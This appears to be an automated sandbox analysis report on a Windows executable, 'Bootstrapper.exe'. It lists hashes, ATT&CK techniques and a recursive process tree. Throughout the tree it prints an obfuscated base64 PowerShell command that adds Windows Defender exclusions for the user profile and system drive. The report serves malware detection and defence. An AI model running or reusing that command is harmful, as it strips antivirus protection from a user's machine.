ca854acb38a73997e862f7693d0e60adf75b22d7b6626ae66260713079fbd3f4

Analysis

max time kernel
63s
max time network
49s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
09/09/2024, 20:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Bootstrapper.exe
Size

5.9MB
MD5

71f9acc8a05119570909a439ab55dad7
SHA1

c84a8f6554207ae3604e7d8ce7ae6890a67ed28b
SHA256

ca854acb38a73997e862f7693d0e60adf75b22d7b6626ae66260713079fbd3f4
SHA512

ac54ee23bdc79b850454290df452df046e95ebd59cb6510789b07a685ba8feba3c0b7c1b00e940aebe6a23f1baac329922636c459ac98026f184718a1244a4fc
SSDEEP

98304:Q2ZaNFr1TwxexfjKAQQVc6bW/g84zg7WJFKoX0pSBEXBZ44iuGasi7b76hoy:QXZe6i/gps7MtXUDXBZtiuoqPao

Score

8^/10

defense_evasion discovery evasion execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
6108	powershell.exe
6172	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Bootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Bootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Bootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Bootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Bootstrapper.exe

Executes dropped EXE 4 IoCs

pid	Process
4928	setup.exe
768	setup.exe
4916	setup.exe
4652	setup.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 4 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
5832	powercfg.exe
6488	powercfg.exe
5940	powercfg.exe
5360	powercfg.exe

Launches sc.exe 9 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4724	sc.exe
5244	sc.exe
6104	sc.exe
6364	sc.exe
5844	sc.exe
6084	sc.exe
1680	sc.exe
824	sc.exe
5840	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bootstrapper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bootstrapper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bootstrapper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bootstrapper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bootstrapper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
6260	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
452	powershell.exe
4876	powershell.exe
3932	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4876	powershell.exe
Token: SeDebugPrivilege	452	powershell.exe
Token: SeDebugPrivilege	3932	powershell.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 2672 wrote to memory of 4876	2672	Bootstrapper.exe	86
PID 2672 wrote to memory of 4876	2672	Bootstrapper.exe	86
PID 2672 wrote to memory of 4876	2672	Bootstrapper.exe	86
PID 2672 wrote to memory of 2252	2672	Bootstrapper.exe	89
PID 2672 wrote to memory of 2252	2672	Bootstrapper.exe	89
PID 2672 wrote to memory of 2252	2672	Bootstrapper.exe	89
PID 2672 wrote to memory of 4928	2672	Bootstrapper.exe	90
PID 2672 wrote to memory of 4928	2672	Bootstrapper.exe	90
PID 2252 wrote to memory of 452	2252	Bootstrapper.exe	91
PID 2252 wrote to memory of 452	2252	Bootstrapper.exe	91
PID 2252 wrote to memory of 452	2252	Bootstrapper.exe	91
PID 2252 wrote to memory of 3236	2252	Bootstrapper.exe	93
PID 2252 wrote to memory of 3236	2252	Bootstrapper.exe	93
PID 2252 wrote to memory of 3236	2252	Bootstrapper.exe	93
PID 2252 wrote to memory of 768	2252	Bootstrapper.exe	94
PID 2252 wrote to memory of 768	2252	Bootstrapper.exe	94
PID 3236 wrote to memory of 3932	3236	Bootstrapper.exe	95
PID 3236 wrote to memory of 3932	3236	Bootstrapper.exe	95
PID 3236 wrote to memory of 3932	3236	Bootstrapper.exe	95
PID 3236 wrote to memory of 4348	3236	Bootstrapper.exe	96
PID 3236 wrote to memory of 4348	3236	Bootstrapper.exe	96
PID 3236 wrote to memory of 4348	3236	Bootstrapper.exe	96
PID 3236 wrote to memory of 4916	3236	Bootstrapper.exe	124
PID 3236 wrote to memory of 4916	3236	Bootstrapper.exe	124
PID 4348 wrote to memory of 3188	4348	Bootstrapper.exe	99
PID 4348 wrote to memory of 3188	4348	Bootstrapper.exe	99
PID 4348 wrote to memory of 3188	4348	Bootstrapper.exe	99
PID 4348 wrote to memory of 4792	4348	Bootstrapper.exe	344
PID 4348 wrote to memory of 4792	4348	Bootstrapper.exe	344
PID 4348 wrote to memory of 4792	4348	Bootstrapper.exe	344
PID 4348 wrote to memory of 4652	4348	Bootstrapper.exe	102
PID 4348 wrote to memory of 4652	4348	Bootstrapper.exe	102

C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2672
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4876
- C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
  "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2252
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:452
- - C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
    "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3236
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3932
  - - C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
      "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4348
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3188
    - - C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        5⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:4792
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        6⤵
        
        PID:1224
      - C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        6⤵
        
        PID:3936
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        7⤵
        
        PID:412
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        7⤵
        
        PID:4392
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        8⤵
        
        PID:1652
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        8⤵
        
        PID:2608
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        9⤵
        
        PID:5020
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        9⤵
        
        PID:3116
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        10⤵
        
        PID:3080
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        10⤵
        
        PID:4700
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        11⤵
        
        PID:732
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        11⤵
        
        PID:4916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        12⤵
        
        PID:4720
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        12⤵
        
        PID:4936
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        13⤵
        
        PID:1016
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        13⤵
        
        PID:824
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        14⤵
        
        PID:4464
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        14⤵
        
        PID:1040
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        15⤵
        
        PID:3852
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        15⤵
        
        PID:2324
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        16⤵
        
        PID:4736
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        16⤵
        
        PID:2276
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        17⤵
        
        PID:3400
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        17⤵
        
        PID:1348
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        18⤵
        
        PID:2752
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        18⤵
        
        PID:1172
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        19⤵
        
        PID:5204
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        19⤵
        
        PID:5212
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        20⤵
        
        PID:5392
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        20⤵
        
        PID:5400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        21⤵
        
        PID:5644
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        21⤵
        
        PID:5668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        22⤵
        
        PID:5916
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        22⤵
        
        PID:5924
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        23⤵
        
        PID:5176
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        23⤵
        
        PID:5156
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        24⤵
        
        PID:5600
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        24⤵
        
        PID:5552
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        25⤵
        
        PID:4248
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        25⤵
        
        PID:6124
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
